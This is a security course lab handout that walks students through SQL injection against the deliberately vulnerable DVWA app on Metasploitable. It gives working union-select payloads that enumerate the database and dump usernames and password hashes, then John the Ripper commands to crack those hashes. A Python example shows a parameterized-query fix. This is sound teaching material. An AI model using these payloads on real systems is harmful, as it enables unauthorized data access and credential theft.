SQL Injection

Prerequisites:

  1. Kali Linux access, either through a virtual machine or through a friend.
  2. Fresh Metasploitable Virtual Machine

Objectives:
The main purpose of this week’s exercise is to learn how to exploit SQL injection and other web-based
vulnerabilities.

Resources:
https://www3.ntu.edu.sg/home/ehchua/programming/sql/MySQL_Beginner.html

Call for Help:
Do your best to try the tasks below. If you’re confused or need help, feel free to email or text me at any
point and I will gladly try to help you. If you’re having an issue, chances are other people are as well,
and I can update the instructions/comments/add content as necessary.

Tasks:

Setup

  1. You’ll need both Kali and Metasploitable running simultaneously. You can do this by running a
    virtual machine, or by pairing with a friend and running Metasploitable over the network (be
    careful here).
  2. Make sure you follow the instructions from lecture, and ensure the networks are set up
    according to your layout.

Intro:

  1. Refamiliarize yourself with the following sections from Offensive Security’s website:
    a. Introduction
    b. Metasploit Fundamentals
    c. Information Gathering
    https://www.offensive-security.com/metasploit-unleashed/
  2. Remember, your Kali and Metasploitable virtual machines can easily be
    redownloaded if you encounter an error. Don’t be afraid to experiment.
  3. Careful with your apostrophes! A curly quote pasted from a document is a different character
    from the straight ASCII quote that the inputs below rely on.
    https://www.cl.cam.ac.uk/~mgk25/ucs/quotes.html

Setup:

  4. Start up both Kali and Metasploitable.
  5. Find the IP address of the Metasploitable virtual machine and point your Kali virtual machine to
    it via Firefox (http://IP). You should be presented with the following (or similar) screen.
  6. Click the DVWA link, and enter the username and password as admin and password.
  7. Click on the DVWA Security button, and set the security level to “Low”.

SQL Injection:

  8. Basic Injection
    a. Click the SQL Injection button.
    b. Enter 1 into the input box and click Submit.
    c. Note: The website is purposely designed to print the user ID, First Name and Surname
    to the screen.
    d. The actual query that is executed is:
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    e. Note the web browser URL and the token that is passed in the URL.
    Experiment with the URL: are you able to get other username/password combinations?
    If so, provide a screenshot.

  1. Always True Case
    a. Input the below text into the User ID textbox.
    %' or '0'='0
    b. Click Submit.
    c. In this case we are modifying the SQL query as it is processed: the text we entered in the
    field is appended to the WHERE clause, so the query returns all the records that are false as
    well as all the records that are true.
    %' : will probably not be equal to anything, and will be false.
    '0'='0' : is always true, because 0 will always equal 0.
    mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
  2. Display Database Version
    a. Input the below text into the User ID textbox.
    %' or 0=0 union select null, version() #
    Submit a screenshot. What is the version of the database? Is the version of the database any
    help to an attacker? What could be done with this information?
  3. Display the Database User
    a. Input the below text into the User ID textbox.
    %' or 0=0 union select null, user() #
    Submit a screenshot. What user is running the query?
    Review: http://www.hexatier.com/mysql-database-security-best-practices-2/ and our lecture
    content.
    What would you recommend to fix, mitigate or monitor these issues?
  4. Display the Database Name
    a. Input the below text into the User ID textbox.
    %' or 0=0 union select null, database() #
  5. Database Exploration
    a. There is a database called information_schema that stores information about the other
    databases. We will use this to our advantage to explore other tables.
    b. Input the below text into the User ID textbox.
    %' and 1=0 union select null, table_name from information_schema.tables #
    Provide a list of a few table names that you found.
    c. Let’s explore the users table to understand its structure.
    d. Input the below text into the User ID textbox.
    %' and 1=0 union select null, concat(table_name,0x0a,column_name) from
    information_schema.columns where table_name = 'users' #
    What columns are in the users table?
    e. Let’s show all the content in the users table.
    Input the below text into the User ID textbox.
    %' and 1=0 union select null,
    concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  6. Find the passwords:
    a. Let’s create a password hash file from these results.
    b. Copy the username and password into a text editor in Kali in the format username:hash.
    c. Save the file to a memorable location.
    d. Open a terminal and run the file against John the Ripper. You’ll need to run the commands
    sequentially.
    john --format=raw-MD5 <YourFilename>
    john --format=raw-MD5 --show <YourFilename>

Produce a list of all the passwords.

  1. Find where the database is stored:
    a. Input the below text into the User ID textbox.
    ' union select null,@@datadir #
    Where is the database stored? Is this useful?
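As an added illustration (not part of this lab or of DVWA’s own code), the script below rebuilds the query from the Basic Injection step over a small constructed SQLite table, shows why the Always True Case returns every row, and shows the parameterized form that the fix/mitigate question in step 3 is asking for. SQLite stands in for MySQL here, so the `#` comment, `version()` and `information_schema` steps are not reproduced; the sample rows are made up.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table (not the real DVWA data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db():
    """Build an in-memory SQLite database shaped like the table the DVWA query reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of the lab's query: the raw $id is pasted straight into the SQL string,
    so a quote in the input closes the literal and the rest is parsed as SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Same query with a bound parameter: the input is only ever treated as a value,
    so the Always True payload is compared as a string and matches nothing."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "%' or '0'='0"          # the Always True Case input from the lab
    print(lookup_vulnerable(db, "1"))         # one row, as the page intends
    print(lookup_vulnerable(db, payload))     # every row: WHERE ... or '0'='0' is always true
    print(lookup_parameterized(db, payload))  # no rows: no user_id equals that literal string
```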

Advanced Tutorials (Recommended but not required):

Burpsuite:
https://tinyurl.com/ycoyzzms
https://tinyurl.com/y9a2rcs3

Mutillidae:
https://www.youtube.com/watch?v=rNkR1Joz4eU
